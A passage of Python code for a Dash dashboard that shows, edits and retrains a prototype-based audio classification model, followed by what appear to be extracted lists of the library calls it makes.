        """On hover, overlay the mel-spectrogram image of the nearest data
        instance onto the cached 2D figure.

        :param hoverData: plotly hover payload with the hovered (x, y) point.
        NOTE(review): the else-branch fetches the nearest prototype but does
        nothing with it — looks like unfinished code; confirm intent.
        """
        point = np.array([hoverData['points'][0]['x'],hoverData['points'][0]['y']])
        # Distances from the hovered point to all prototypes / instances in
        # the currently displayed 2D components.
        dist_protos = self.model_containers[self.fold_test].prototypes.get_distances(point,components=(self.x_select,self.y_select))
        dist_data = self.model_containers[self.fold_test].data_instances.get_distances(point,components=(self.x_select,self.y_select))
        #print(np.amin(dist_data),np.amin(dist_protos))
        if np.amin(dist_data) <= np.amin(dist_protos): # nearest is a data instance
            arg_dist = np.argmin(dist_data)
            # print(arg_dist)
            (center_mel,center_feat,center_2D,
             center_class,center_file,center_audio)=self.model_containers[self.fold_test].data_instances.get_center(arg_dist)
            from PIL import Image
            image_array = np.random.randint(0, 255, size=(100, 100)).astype('uint8')
            # Map the mel-spectrogram through the viridis colormap to RGBA.
            center_mel = cm(center_mel.T)
            #center_mel = 255*(center_mel-np.amin(center_mel))/(np.amax(center_mel)-np.amin(center_mel))
            image = Image.fromarray((center_mel[:, :, :3] * 255).astype('uint8'))
            # Anchor the thumbnail slightly left of and above the hover point.
            layout= go.Layout(images= [dict(
                      source= image,
                      xref= "x",
                      yref= "y",
                      x= hoverData['points'][0]['x']-0.5,
                      y= hoverData['points'][0]['y']+2,
                      sizex= 2,
                      sizey= 2,
                      #sizing= "stretch",
                      opacity= 1.0#,layer= "below"
                  )])
            self.figure.update_layout(layout)
        else:
            arg_dist = np.argmin(dist_protos)
            (proto_feat,proto_mel,
             proto_2D,proto_class,proto_audio) = self.model_containers[self.fold_test].prototypes.get_prototype_by_index(arg_dist)
    def display_plot(self,clickData):
        """Dash callback body: show the mel-spectrogram and audio of the point
        nearest to a click, and configure the action button accordingly.

        :param clickData: plotly click payload (dict) or None.
        :return: [mel figure, audio-player props, button label, button style].
        """
        # Blank spectrogram used when nothing is selected.
        temp_mel = np.ones((64,128))
        if isinstance(clickData,dict):
            point = np.array([clickData['points'][0]['x'],clickData['points'][0]['y']])
            print(self.fold_test)
            dist_protos = self.model_containers[self.fold_test].prototypes.get_distances(point,components=(self.x_select,self.y_select))
            dist_data = self.model_containers[self.fold_test].data_instances.get_distances(point,components=(self.x_select,self.y_select))
            if np.amin(dist_data) <= np.amin(dist_protos): # nearest is a data instance
                arg_dist = np.argmin(dist_data)
                (center_feat,center_mel,center_2D,
                 center_class,center_audio,center_file)=self.model_containers[self.fold_test].data_instances.get_instance_by_index(arg_dist)
                # Remember the selection so button callbacks know what to act on.
                self.selected = {'type': 'center', 'id': arg_dist}
                figure = self.generate_figure_mel(center_mel)
                # Load the instance's audio from disk for the in-browser player.
                data, sr = librosa.core.load(center_file)
                return [figure,
                        {'autoPlay': True, 'src': encode_audio(data,sr)}, #encode_audio(center_audio['data'],center_audio['sr'])
                        "Convert center to Prototype", {'display':'inline-block','width':'70%'}]
            else:
                arg_dist = np.argmin(dist_protos)
                (proto_feat,proto_mel,
                 proto_2D,proto_class,proto_audio) = self.model_containers[self.fold_test].prototypes.get_instance_by_index(arg_dist)
                self.selected = {'type': 'prototype', 'id': arg_dist}
                figure = self.generate_figure_mel(proto_mel)
                return [figure,
                        {'autoPlay': True, 'src': encode_audio(proto_audio['data'],proto_audio['sr'])},
                        "Delete Prototype", {'display':'inline-block','width':'70%'}]
        else:
            # No click yet: blank spectrogram, silent player, hidden button.
            return [self.generate_figure_mel(temp_mel), {'autoPlay': False, 'src': ''},
                    "Select a point", {'display':'none','width':'70%'}]
def buttons_and_others(self,btn1,btn2,btn3,fold_selected,clickData,samples_per_class,x_select,y_select,epochs,learning_rate,batch_size,selectedData,selectedData_w):
    """Central Dash callback multiplexing every dashboard control.

    Only one input changes per invocation; the checks below run in
    priority order and return as soon as the changed input is detected.
    ``btn1``/``btn2``/``btn3`` are the click timestamps of the
    delete / reset / train buttons; a new press is detected by comparing
    each against the stored value in ``self.click_timestamps``.

    Returns ``[self.figure, self.fig_weigths]`` in every case.
    """
    # A changed axis selection forces a redraw of the 2-D projection.
    if x_select != self.x_select:
        self.x_select = x_select
        self.generate_figure2D()
        return [self.figure, self.fig_weigths]
    if y_select != self.y_select:
        self.y_select = y_select
        self.generate_figure2D()
        return [self.figure, self.fig_weigths]
    if samples_per_class != self.samples_per_class:
        #print(samples_per_class,self.samples_per_class)
        self.samples_per_class = samples_per_class
        self.generate_figure2D()
        #print('new figure')
        return [self.figure, self.fig_weigths]
    # if model_select != self.model_input_name:
    #     print(model_select,self.model_input_name)
    #     self.model_input_name = model_select
    #     scaler_path = os.path.join(scaler_folder, 'base')
    #     self.load_model_prototypes_centers(folds_data_test,folds_files,scaler_path)
    #     return [self.figure, self.fig_weigths]
    #print(clickData,selectedData_w)
    #self.generate_figure2D(selectedpoints=clickData)
    #print(fold_selected,self.fold_test)
    # Fold dropdown changed: reload everything for the new fold.
    if fold_selected != self.fold_test:
        self.change_fold(fold_selected)
        return [self.figure, self.fig_weigths]
    #print(clickData)
    # Click on the weights plot: highlight the selected prototype.
    if clickData is not None:
        selected_prototype = clickData['points'][0]['x']
        #print(selected_prototype,self.selected_prototype)
        if selected_prototype != self.selected_prototype:
            self.selected_prototype = selected_prototype
            self.generate_figure2D([selected_prototype])
            #print(clickData)
            return [self.figure, self.fig_weigths]
    #print(btn1,btn2,btn3,self.click_timestamps[0],self.click_timestamps[1],self.click_timestamps[2])
    # Button presses: a strictly newer timestamp means a fresh click.
    if int(btn1) > self.click_timestamps[0]:
        self.click_timestamps[0] = int(btn1)
        self.click_delete(selectedData)
    if int(btn2) > self.click_timestamps[1]:
        self.click_timestamps[1] = int(btn2)
        self.click_reset()
    if int(btn3) > self.click_timestamps[2]:
        self.click_timestamps[2] = int(btn3)
        msg = 'Button 3 was most recently clicked'
        # Override training hyper-parameters only when the user filled them in.
        if epochs is not None:
            self.params['train']['epochs'] = int(epochs)
        if learning_rate is not None:
            self.params['train']['learning_rate'] = learning_rate
        if batch_size is not None:
            self.params['train']['batch_size'] = int(batch_size)
        print(epochs,learning_rate,batch_size)
        self.train_model()
        #self.model_output_name = model_output_name
        #scaler_path = os.path.join(scaler_folder, 'base')
        #weights_folder_debug_manual = os.path.join(weights_folder, 'debug_manual2')
        #last_training_log = self.get_training_log()[-1]
        #initial_epoch = int(last_training_log['epochs'][-1])+1
        #self.train_model(folds_data=folds_data,folds_data_test=folds_data_test,folds_files=folds_files,scaler_path=scaler_path,
        #                 epochs=epochs,learning_rate=learning_rate,batch_size=batch_size,fit_verbose=1,convert_audio_dict=convert_audio_dict,graph=graph,initial_epoch=initial_epoch)
    return [self.figure, self.fig_weigths]
def btn_load(self,n_clicks_timestamp,n_clicks_timestamp2):
    """Dispatch the load-weights / evaluate button pair.

    The button with the larger (more recent) click timestamp wins.
    Returns a status string for the UI; an empty string when neither
    button has been pressed yet.
    """
    if n_clicks_timestamp2 > n_clicks_timestamp:
        # Evaluate the current model on the validation fold.
        acc = self.eval_model()
        return "Accuracy in fold {:s}: {:f}".format(self.fold_val, acc)
    if n_clicks_timestamp > n_clicks_timestamp2:
        # Weight loading is not wired up yet.
        #self.load_weights(weights_folder_debug_manual)
        return "TODO"#"Weights loaded from " + weights_folder_debug_manual
    return ""
def click_delete(self,selectedData):
    """Delete/convert the currently selected point.

    If the selected point is nearest to a data instance, that instance
    is removed from the data store and added as a new prototype (its
    audio reloaded from disk); if it is nearest to a prototype, the
    prototype is removed. Both figures are then redrawn.

    Returns the refreshed 2-D figure.
    """
    #msg = 'Button 1 was most recently clicked'
    point = np.array([selectedData['points'][0]['x'],selectedData['points'][0]['y']])
    # Distances on the currently displayed projection components.
    dist_protos = self.model_containers[self.fold_test].prototypes.get_distances(point,components=(self.x_select,self.y_select))
    dist_data = self.model_containers[self.fold_test].data_instances.get_distances(point,components=(self.x_select,self.y_select))
    #print(np.amin(dist_data),np.amin(dist_protos))
    if np.amin(dist_data) <= np.amin(dist_protos): # click on k-mean
        # Convert the nearest data instance into a prototype.
        arg_dist = np.argmin(dist_data)
        (center_feat,center_mel,center_2D,
        center_class,_,center_file) = self.model_containers[self.fold_test].data_instances.remove_instance(arg_dist)
        data, sr = librosa.core.load(center_file)
        center_audio = {'data':data, 'sr': sr}
        self.model_containers[self.fold_test].prototypes.add_instance(int(center_class),
                                                                      center_mel,center_feat,
                                                                      embedding2D=center_2D,audio=center_audio)
    else:
        # Remove the nearest prototype.
        arg_dist = np.argmin(dist_protos)
        self.model_containers[self.fold_test].prototypes.remove_instance(arg_dist)
    self.generate_figure2D()
    self.generate_figure_weights()
    return self.figure
def click_reset(self):
    """Discard all interactive edits for the current fold.

    Restores the stored data instances and prototypes, then redraws
    both the 2-D projection and the weights figure.
    """
    container = self.model_containers[self.fold_test]
    container.data_instances.reset()
    container.prototypes.reset()
    self.generate_figure2D()
    self.generate_figure_weights()
    return self.figure
def change_fold(self,fold_selected):
    """Switch the dashboard to a new test fold and refresh the plots."""
    print('fold_selected', fold_selected)
    self.fold_test = fold_selected
    # The validation fold is derived from the chosen test fold.
    self.fold_val = get_fold_val(fold_selected, self.fold_list)
    print(self.fold_val)
    self.generate_figure2D()
    self.generate_figure_weights()
    return self.figure
def eval_model(self):
    """Evaluate the current (prototype-synchronised) model.

    Rebuilds the Keras model from the possibly edited prototypes first,
    then evaluates it on the validation fold using the scaler saved for
    the current test fold.

    Returns
    -------
    float
        Accuracy on ``self.fold_val``.
    """
    with self.graph.as_default():
        self.update_model_to_prototypes()
        scaler_path = os.path.join(self.exp_folder_input, self.fold_test, 'scaler.pickle')
        scaler = load_pickle(scaler_path)
        acc,_,_ = self.model_containers[self.fold_test].evaluate(self.data[self.fold_val]['X'],self.data[self.fold_val]['Y'], scaler)
        return acc
def update_model_to_prototypes(self):
    """Rebuild the Keras model so it matches the (possibly edited) prototypes.

    A fresh APNet model is built with the current number of prototypes;
    the prototype-dependent layers take their weights from the prototype
    store, every other layer copies its weights from the old model.
    The rebuilt model replaces the old one in the model container.
    """
    N_protos = self.model_containers[self.fold_test].prototypes.get_number_of_instances()
    n_classes = len(self.label_list)  # currently unused below
    #self.model_containers[self.fold_test].model = debugg_model(self.model_containers[self.fold_test].model,N_protos,n_classes)
    #self.model_containers[self.fold_test].model.get_layer('prototype_distances').set_weights([self.model_containers[self.fold_test].prototypes.embeddings])
    #self.model_containers[self.fold_test].model.get_layer('mean').set_weights([self.model_containers[self.fold_test].prototypes.W_mean])
    #self.model_containers[self.fold_test].model.get_layer('logits').set_weights([self.model_containers[self.fold_test].prototypes.W_dense])
    # Input geometry comes from the stored prototype spectrograms; the
    # feature depth from the old model's 'features' layer.
    n_frames_cnn,n_freq_cnn = self.model_containers[self.fold_test].prototypes.mel_spectrograms[0].shape
    N_filters_last = self.model_containers[self.fold_test].model.get_layer('features').output_shape[-1]
    model = modelAPNet(n_prototypes=N_protos, n_frames_cnn=n_frames_cnn, n_freq_cnn=n_freq_cnn, N_filters=[16,16,N_filters_last])
    for layer in model.layers:
        # Only layers that actually hold weights need transferring.
        if len(layer.get_weights()) > 0:
            if layer.name == 'prototype_distances':
                model.get_layer(layer.name).set_weights([self.model_containers[self.fold_test].prototypes.embeddings])
            elif layer.name == 'mean':
                model.get_layer(layer.name).set_weights([self.model_containers[self.fold_test].prototypes.W_mean])
            elif layer.name == 'logits':
                model.get_layer(layer.name).set_weights([self.model_containers[self.fold_test].prototypes.W_dense])
            elif layer.name == 'input':
                continue
            else:
                # All remaining layers are copied verbatim from the old model.
                model.get_layer(layer.name).set_weights(self.model_containers[self.fold_test].model.get_layer(layer.name).get_weights())
    self.model_containers[self.fold_test].model = model
def train_model(self):
    """(Re)train the model starting from the current prototype state.

    Pipeline: sync the model with the edited prototypes, train on the
    train/val split for the current fold, reload the best checkpoint,
    recompute prototypes and 2-D projections from the retrained model,
    persist them, and redraw both figures.

    Returns the refreshed 2-D figure.
    """
    with self.graph.as_default():
        self.update_model_to_prototypes()
        # paths
        dataset = self.exp_folder_output.split("/")[-1] #TODO fix this
        exp_folder_fold = os.path.join(self.exp_folder_output, self.fold_test)
        weights_path = exp_folder_fold#os.path.join(exp_folder_fold, 'best_weights.hdf5')
        log_path = os.path.join(exp_folder_fold, 'training.log')
        scaler_path = os.path.join(self.exp_folder_input, self.fold_test, 'scaler.pickle')
        params_model = self.params["models"]['APNet']
        params_dataset = self.params["datasets"][dataset]
        # Training kwargs: base params, optionally overridden per model;
        # the last layer is kept as-is (no re-initialisation).
        kwargs = self.params["train"]
        if 'train_arguments' in params_model:
            kwargs.update(params_model['train_arguments'])
        kwargs.update({'init_last_layer': False})
        # save model as json
        self.model_containers[self.fold_test].save_model_json(exp_folder_fold)
        X_train, Y_train, X_val, Y_val = get_data_train(self.data, self.fold_test, params_dataset["evaluation_mode"])
        # HERE HAS TO BE DATA FOR TRAINING
        #print(X_train.shape,Y_train.shape,X_val.shape,Y_val.shape)
        scaler = load_pickle(scaler_path)
        X_train = scaler.transform(X_train)
        X_val = scaler.transform(X_val)
        self.model_containers[self.fold_test].train(X_train, Y_train, X_val, Y_val,
                                                    weights_path=weights_path, log_path=log_path, **kwargs)
        # load best_weights after training
        self.model_containers[self.fold_test].model.load_weights(os.path.join(exp_folder_fold, 'best_weights.hdf5'))
        # val_out_acc = history.history['val_out_acc']
        # epochs = [i for i in range(initial_epoch,epochs+initial_epoch)]
        # self.training_logs[self.fold_test][-1]['epochs'] = epochs
        # self.training_logs[self.fold_test][-1]['val_acc'] = val_out_acc
        # self.training_logs[self.fold_test][-1]['training'] = False
        # #print(self.training_logs[self.fold_test][-1])
        # #print(history.history)
        print('Reloading the plot')
        # NOTE(review): these two paths are recomputed below with
        # self.exp_folder_output instead of exp_folder_fold, making
        # these assignments dead — confirm which location is intended.
        data_instances_path = os.path.join(exp_folder_fold, 'data_instances.pickle')
        prototypes_path = os.path.join(exp_folder_fold, 'prototypes.pickle')
        X_feat,X_train,Y_train,Files_names_train = get_data_test(self.model_containers[self.fold_test].model,self.data,self.fold_test,self.folds_files,scaler)
        # TODO: data_centers[fold_test] = Data_centers(X_feat,X_train,Y_train,Files_names_train,n_classes=10,n_clusters=5)
        mel_basis = np.load(os.path.join(params_dataset['feature_folder'], 'mel_basis.npy'))
        convert_audio_params = {'sr': self.params['features']['sr'],
                                'scaler' : scaler,
                                'mel_basis' : mel_basis,
                                'audio_hop' : self.params['features']['audio_hop'],
                                'audio_win' : self.params['features']['audio_win']}
        # Reuse the existing 2-D projection so points stay comparable.
        projection2D = self.model_containers[self.fold_test].data_instances.projection2D
        self.model_containers[self.fold_test].get_prototypes(X_train,
                                                             convert_audio_params=convert_audio_params,
                                                             projection2D=projection2D)
        data_instances_path = os.path.join(self.exp_folder_output, 'data_instances.pickle')
        prototypes_path = os.path.join(self.exp_folder_output, 'prototypes.pickle')
        save_pickle(self.model_containers[self.fold_test].data_instances, data_instances_path)
        save_pickle(self.model_containers[self.fold_test].prototypes, prototypes_path)
        self.generate_figure2D()
        self.generate_figure_weights()
        return self.figure
def load_weights(self, weights_folder=''):
    """Load the saved per-fold weights into the current model.

    Expects a file named ``fold<fold_test>.hdf5`` inside
    *weights_folder*.
    """
    filename = 'fold' + str(self.fold_test) + '.hdf5'  # _{epoch:02d}
    target = os.path.join(weights_folder, filename)
    self.model_containers[self.fold_test].model.load_weights(target)
    #scaler = load_scaler(scaler_path,self.fold_test)
def get_training_log(self):
    """Return the training-log list recorded for the current test fold."""
    logs = self.training_logs
    return logs[self.fold_test]
def append_training_log(self,training_log_new):
    """Record a new training-log entry for the current test fold."""
    fold_logs = self.training_logs[self.fold_test]
    fold_logs.append(training_log_new)
| [
"dash_html_components.Button",
"dcase_models.util.files.save_pickle",
"numpy.array",
"plotly.graph_objects.layout.Title",
"dash_audio_components.DashAudioComponents",
"dash_html_components.Div",
"librosa.core.load",
"dash_html_components.Br",
"plotly.graph_objects.Scatter",
"numpy.argmin",
"plot... | [((1746, 1769), 'matplotlib.pyplot.get_cmap', 'plt.get_cmap', (['"""viridis"""'], {}), "('viridis')\n", (1758, 1769), True, 'import matplotlib.pyplot as plt\n'), ((4152, 4181), 'plotly.subplots.make_subplots', 'make_subplots', ([], {'rows': '(1)', 'cols': '(1)'}), '(rows=1, cols=1)\n', (4165, 4181), False, 'from plotly.subplots import make_subplots\n'), ((7168, 7231), 'plotly.express.imshow', 'px.imshow', (['model_container.prototypes.W_dense.T'], {'origin': '"""lower"""'}), "(model_container.prototypes.W_dense.T, origin='lower')\n", (7177, 7231), True, 'import plotly.express as px\n'), ((8536, 8573), 'plotly.express.imshow', 'px.imshow', (['mel_spec.T'], {'origin': '"""lower"""'}), "(mel_spec.T, origin='lower')\n", (8545, 8573), True, 'import plotly.express as px\n'), ((9779, 9823), 'dcase_models.util.data.get_fold_val', 'get_fold_val', (['self.fold_test', 'self.fold_list'], {}), '(self.fold_test, self.fold_list)\n', (9791, 9823), False, 'from dcase_models.util.data import get_fold_val\n'), ((10490, 10512), 'tensorflow.get_default_graph', 'tf.get_default_graph', ([], {}), '()\n', (10510, 10512), True, 'import tensorflow as tf\n'), ((10603, 10692), 'dash_core_components.Graph', 'dcc.Graph', ([], {'id': '"""plot2D"""', 'figure': 'self.figure', 'style': "{'height': '100%', 'width': '100%'}"}), "(id='plot2D', figure=self.figure, style={'height': '100%', 'width':\n '100%'})\n", (10612, 10692), True, 'import dash_core_components as dcc\n'), ((11083, 11192), 'dash_core_components.Graph', 'dcc.Graph', ([], {'id': '"""plot_weights"""', 'figure': 'self.fig_weigths', 'style': "{'width': '100%', 'display': 'inline-block'}"}), "(id='plot_weights', figure=self.fig_weigths, style={'width':\n '100%', 'display': 'inline-block'})\n", (11092, 11192), True, 'import dash_core_components as dcc\n'), ((11286, 11389), 'dash_audio_components.DashAudioComponents', 'dash_audio_components.DashAudioComponents', ([], {'id': '"""audio-player"""', 'src': '""""""', 'autoPlay': 
'(False)', 'controls': '(True)'}), "(id='audio-player', src='',\n autoPlay=False, controls=True)\n", (11327, 11389), False, 'import dash_audio_components\n'), ((11469, 11614), 'dash_html_components.Button', 'html.Button', (['"""Delete prototype"""'], {'id': '"""delete_and_convert"""', 'className': '"""button"""', 'n_clicks_timestamp': '(0)', 'style': "{'display': 'none', 'width': '70%'}"}), "('Delete prototype', id='delete_and_convert', className='button',\n n_clicks_timestamp=0, style={'display': 'none', 'width': '70%'})\n", (11480, 11614), True, 'import dash_html_components as html\n'), ((11627, 11737), 'dash_html_components.Button', 'html.Button', (['"""Evaluate model"""'], {'id': '"""eval"""', 'className': '"""button"""', 'n_clicks_timestamp': '(0)', 'style': "{'width': '70%'}"}), "('Evaluate model', id='eval', className='button',\n n_clicks_timestamp=0, style={'width': '70%'})\n", (11638, 11737), True, 'import dash_html_components as html\n'), ((11752, 11873), 'dash_html_components.Button', 'html.Button', (['"""Load best weigths"""'], {'id': '"""load_weigths"""', 'className': '"""button"""', 'n_clicks_timestamp': '(0)', 'style': "{'width': '70%'}"}), "('Load best weigths', id='load_weigths', className='button',\n n_clicks_timestamp=0, style={'width': '70%'})\n", (11763, 11873), True, 'import dash_html_components as html\n'), ((11889, 11997), 'dash_html_components.Button', 'html.Button', (['"""Train model"""'], {'id': '"""train"""', 'className': '"""button"""', 'n_clicks_timestamp': '(0)', 'style': "{'width': '70%'}"}), "('Train model', id='train', className='button',\n n_clicks_timestamp=0, style={'width': '70%'})\n", (11900, 11997), True, 'import dash_html_components as html\n'), ((12013, 12121), 'dash_html_components.Button', 'html.Button', (['"""Reset model"""'], {'id': '"""reset"""', 'className': '"""button"""', 'n_clicks_timestamp': '(0)', 'style': "{'width': '70%'}"}), "('Reset model', id='reset', className='button',\n n_clicks_timestamp=0, 
style={'width': '70%'})\n", (12024, 12121), True, 'import dash_html_components as html\n'), ((12136, 12186), 'dash_html_components.Div', 'html.Div', ([], {'id': '"""output_eval"""', 'style': "{'width': '20%'}"}), "(id='output_eval', style={'width': '20%'})\n", (12144, 12186), True, 'import dash_html_components as html\n'), ((12207, 12233), 'dash_html_components.Div', 'html.Div', ([], {'id': '"""output_text"""'}), "(id='output_text')\n", (12215, 12233), True, 'import dash_html_components as html\n'), ((12260, 12290), 'dash_html_components.Div', 'html.Div', ([], {'id': '"""output_interval"""'}), "(id='output_interval')\n", (12268, 12290), True, 'import dash_html_components as html\n'), ((12316, 12433), 'dash_core_components.Input', 'dcc.Input', ([], {'id': '"""input_epochs"""', 'type': '"""number"""', 'placeholder': '"""epochs"""', 'min': '(1)', 'max': '(100)', 'step': '(1)', 'style': "{'width': '33%'}"}), "(id='input_epochs', type='number', placeholder='epochs', min=1,\n max=100, step=1, style={'width': '33%'})\n", (12325, 12433), True, 'import dash_core_components as dcc\n'), ((12458, 12577), 'dash_core_components.Input', 'dcc.Input', ([], {'id': '"""learning_rate"""', 'type': '"""number"""', 'placeholder': '"""learning_rate"""', 'min': '(1e-07)', 'max': '(1)', 'style': "{'width': '33%'}"}), "(id='learning_rate', type='number', placeholder='learning_rate',\n min=1e-07, max=1, style={'width': '33%'})\n", (12467, 12577), True, 'import dash_core_components as dcc\n'), ((12595, 12716), 'dash_core_components.Input', 'dcc.Input', ([], {'id': '"""batch_size"""', 'type': '"""number"""', 'placeholder': '"""batch_size"""', 'min': '(32)', 'max': '(512)', 'step': '(32)', 'style': "{'width': '33%'}"}), "(id='batch_size', type='number', placeholder='batch_size', min=32,\n max=512, step=32, style={'width': '33%'})\n", (12604, 12716), True, 'import dash_core_components as dcc\n'), ((12881, 12952), 'dash_core_components.Interval', 'dcc.Interval', ([], {'id': 
'"""interval-component"""', 'interval': '(1 * 1000)', 'n_intervals': '(0)'}), "(id='interval-component', interval=1 * 1000, n_intervals=0)\n", (12893, 12952), True, 'import dash_core_components as dcc\n'), ((13169, 13267), 'dash_core_components.Dropdown', 'dcc.Dropdown', ([], {'id': '"""fold_select"""', 'options': 'options', 'value': 'self.fold_test', 'style': "{'width': '85%'}"}), "(id='fold_select', options=options, value=self.fold_test, style\n ={'width': '85%'})\n", (13181, 13267), True, 'import dash_core_components as dcc\n'), ((13687, 13764), 'dash_core_components.Dropdown', 'dcc.Dropdown', ([], {'id': '"""x_select"""', 'options': 'options', 'value': '(0)', 'style': "{'width': '80%'}"}), "(id='x_select', options=options, value=0, style={'width': '80%'})\n", (13699, 13764), True, 'import dash_core_components as dcc\n'), ((13781, 13858), 'dash_core_components.Dropdown', 'dcc.Dropdown', ([], {'id': '"""y_select"""', 'options': 'options', 'value': '(1)', 'style': "{'width': '80%'}"}), "(id='y_select', options=options, value=1, style={'width': '80%'})\n", (13793, 13858), True, 'import dash_core_components as dcc\n'), ((13876, 13954), 'dash_html_components.Div', 'html.Div', (['[button_eval, output_eval]'], {'style': "{'columnCount': 2, 'width': '50%'}"}), "([button_eval, output_eval], style={'columnCount': 2, 'width': '50%'})\n", (13884, 13954), True, 'import dash_html_components as html\n'), ((13971, 14039), 'dash_html_components.Div', 'html.Div', (['[input_epochs, input_lr, input_bs]'], {'style': "{'width': '70%'}"}), "([input_epochs, input_lr, input_bs], style={'width': '70%'})\n", (13979, 14039), True, 'import dash_html_components as html\n'), ((14097, 14162), 'dash_html_components.Div', 'html.Div', (['[fold_select]'], {'style': "{'columnCount': 3, 'width': '80%'}"}), "([fold_select], style={'columnCount': 3, 'width': '80%'})\n", (14105, 14162), True, 'import dash_html_components as html\n'), ((14185, 14264), 'dash_html_components.Div', 'html.Div', 
(['[button_load, button_reset]'], {'style': "{'columnCount': 2, 'width': '50%'}"}), "([button_load, button_reset], style={'columnCount': 2, 'width': '50%'})\n", (14193, 14264), True, 'import dash_html_components as html\n'), ((18476, 18505), 'plotly.subplots.make_subplots', 'make_subplots', ([], {'rows': '(1)', 'cols': '(1)'}), '(rows=1, cols=1)\n', (18489, 18505), False, 'from plotly.subplots import make_subplots\n'), ((20535, 20592), 'os.path.join', 'os.path.join', (['self.weights_folder', 'self.model_output_name'], {}), '(self.weights_folder, self.model_output_name)\n', (20547, 20592), False, 'import os\n'), ((24016, 24084), 'numpy.array', 'np.array', (["[hoverData['points'][0]['x'], hoverData['points'][0]['y']]"], {}), "([hoverData['points'][0]['x'], hoverData['points'][0]['y']])\n", (24024, 24084), True, 'import numpy as np\n'), ((25940, 25958), 'numpy.ones', 'np.ones', (['(64, 128)'], {}), '((64, 128))\n', (25947, 25958), True, 'import numpy as np\n'), ((32128, 32202), 'numpy.array', 'np.array', (["[selectedData['points'][0]['x'], selectedData['points'][0]['y']]"], {}), "([selectedData['points'][0]['x'], selectedData['points'][0]['y']])\n", (32136, 32202), True, 'import numpy as np\n'), ((33851, 33895), 'dcase_models.util.data.get_fold_val', 'get_fold_val', (['self.fold_test', 'self.fold_list'], {}), '(self.fold_test, self.fold_list)\n', (33863, 33895), False, 'from dcase_models.util.data import get_fold_val\n'), ((40732, 40774), 'os.path.join', 'os.path.join', (['weights_folder', 'weights_file'], {}), '(weights_folder, weights_file)\n', (40744, 40774), False, 'import os\n'), ((4802, 4990), 'plotly.graph_objects.Scatter', 'go.Scatter', ([], {'x': 'x[j]', 'y': 'y[j]', 'text': 'classes[j]', 'name': 'proto_list[j]', 'mode': '"""markers"""', 'selectedpoints': 'selectedpoints_j', 'marker': "{'size': size, 'symbol': 'cross', 'color': colors[j % 10]}"}), "(x=x[j], y=y[j], text=classes[j], name=proto_list[j], mode=\n 'markers', selectedpoints=selectedpoints_j, 
marker={'size': size,\n 'symbol': 'cross', 'color': colors[j % 10]})\n", (4812, 4990), True, 'import plotly.graph_objects as go\n'), ((5097, 5304), 'plotly.graph_objects.Scatter', 'go.Scatter', ([], {'x': 'x_centers[j][:s]', 'y': 'y_centers[j][:s]', 'text': 'classes_centers[j][:s]', 'name': 'label_list[j]', 'selectedpoints': 'None', 'mode': '"""markers"""', 'marker': "{'size': 5, 'color': colors[j % 10], 'opacity': 0.6}"}), "(x=x_centers[j][:s], y=y_centers[j][:s], text=classes_centers[j][\n :s], name=label_list[j], selectedpoints=None, mode='markers', marker={\n 'size': 5, 'color': colors[j % 10], 'opacity': 0.6})\n", (5107, 5304), True, 'import plotly.graph_objects as go\n'), ((7610, 7641), 'plotly.graph_objects.Scatter', 'go.Scatter', ([], {'x': '[selected]', 'y': '[1]'}), '(x=[selected], y=[1])\n', (7620, 7641), True, 'import plotly.graph_objects as go\n'), ((12756, 12844), 'dash_core_components.Slider', 'dcc.Slider', ([], {'id': '"""samples_per_class"""', 'min': '(1)', 'max': '(500)', 'step': '(1)', 'value': '(10)', 'vertical': '(False)'}), "(id='samples_per_class', min=1, max=500, step=1, value=10,\n vertical=False)\n", (12766, 12844), True, 'import dash_core_components as dcc\n'), ((21550, 21570), 'plotly.graph_objects.Figure', 'go.Figure', ([], {'data': 'data'}), '(data=data)\n', (21559, 21570), True, 'import plotly.graph_objects as go\n'), ((21869, 21905), 'plotly.graph_objects.Figure', 'go.Figure', ([], {'data': "{'x': [0], 'y': [0]}"}), "(data={'x': [0], 'y': [0]})\n", (21878, 21905), True, 'import plotly.graph_objects as go\n'), ((22283, 22372), 'plotly.express.imshow', 'px.imshow', (['self.model_containers[self.fold_test].prototypes.W_dense.T'], {'origin': '"""lower"""'}), "(self.model_containers[self.fold_test].prototypes.W_dense.T,\n origin='lower')\n", (22292, 22372), True, 'import plotly.express as px\n'), ((23568, 23605), 'plotly.express.imshow', 'px.imshow', (['mel_spec.T'], {'origin': '"""lower"""'}), "(mel_spec.T, origin='lower')\n", (23577, 
23605), True, 'import plotly.express as px\n'), ((24420, 24438), 'numpy.amin', 'np.amin', (['dist_data'], {}), '(dist_data)\n', (24427, 24438), True, 'import numpy as np\n'), ((24442, 24462), 'numpy.amin', 'np.amin', (['dist_protos'], {}), '(dist_protos)\n', (24449, 24462), True, 'import numpy as np\n'), ((24505, 24525), 'numpy.argmin', 'np.argmin', (['dist_data'], {}), '(dist_data)\n', (24514, 24525), True, 'import numpy as np\n'), ((25692, 25714), 'numpy.argmin', 'np.argmin', (['dist_protos'], {}), '(dist_protos)\n', (25701, 25714), True, 'import numpy as np\n'), ((26017, 26085), 'numpy.array', 'np.array', (["[clickData['points'][0]['x'], clickData['points'][0]['y']]"], {}), "([clickData['points'][0]['x'], clickData['points'][0]['y']])\n", (26025, 26085), True, 'import numpy as np\n'), ((32537, 32555), 'numpy.amin', 'np.amin', (['dist_data'], {}), '(dist_data)\n', (32544, 32555), True, 'import numpy as np\n'), ((32559, 32579), 'numpy.amin', 'np.amin', (['dist_protos'], {}), '(dist_protos)\n', (32566, 32579), True, 'import numpy as np\n'), ((32622, 32642), 'numpy.argmin', 'np.argmin', (['dist_data'], {}), '(dist_data)\n', (32631, 32642), True, 'import numpy as np\n'), ((32839, 32869), 'librosa.core.load', 'librosa.core.load', (['center_file'], {}), '(center_file)\n', (32856, 32869), False, 'import librosa\n'), ((33228, 33250), 'numpy.argmin', 'np.argmin', (['dist_protos'], {}), '(dist_protos)\n', (33237, 33250), True, 'import numpy as np\n'), ((34203, 34271), 'os.path.join', 'os.path.join', (['self.exp_folder_input', 'self.fold_test', '"""scaler.pickle"""'], {}), "(self.exp_folder_input, self.fold_test, 'scaler.pickle')\n", (34215, 34271), False, 'import os\n'), ((34293, 34317), 'dcase_models.util.files.load_pickle', 'load_pickle', (['scaler_path'], {}), '(scaler_path)\n', (34304, 34317), False, 'from dcase_models.util.files import save_pickle, load_pickle\n'), ((36739, 36791), 'os.path.join', 'os.path.join', (['self.exp_folder_output', 'self.fold_test'], {}), 
